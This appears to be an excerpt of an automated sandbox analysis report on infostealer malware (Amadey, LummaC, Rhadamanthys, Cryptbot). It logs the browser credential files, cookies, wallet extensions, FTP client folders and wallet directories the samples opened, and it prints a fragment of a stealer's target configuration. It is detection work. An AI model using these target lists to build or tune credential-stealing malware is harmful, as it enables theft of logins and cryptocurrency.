WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.skotes.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1483791860.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1485484180.0000000004630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1455149743.0000000004820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1570343536.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 3a1a782de7.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000008.00000003.1721363531.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1732609281.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1721407127.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1716803136.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 3a1a782de7.exe, 0000000E.00000002.2166261760.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: 3a1a782de7.exe, 0000000E.00000002.2166261760.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: 3a1a782de7.exe	String found in binary or memory: Jaxx Liberty
Source: 3a1a782de7.exe, 0000000E.00000002.2166261760.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 3a1a782de7.exe, 0000000E.00000003.2104798979.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""]p
Source: 3a1a782de7.exe	String found in binary or memory: ExodusWeb3
Source: 3a1a782de7.exe, 0000000E.00000002.2166261760.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 3a1a782de7.exe, 0000000E.00000003.2064174110.0000000000E39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 3a1a782de7.exe, 0000000E.00000003.2065663061.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.8:49725 -> 185.185.71.170:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
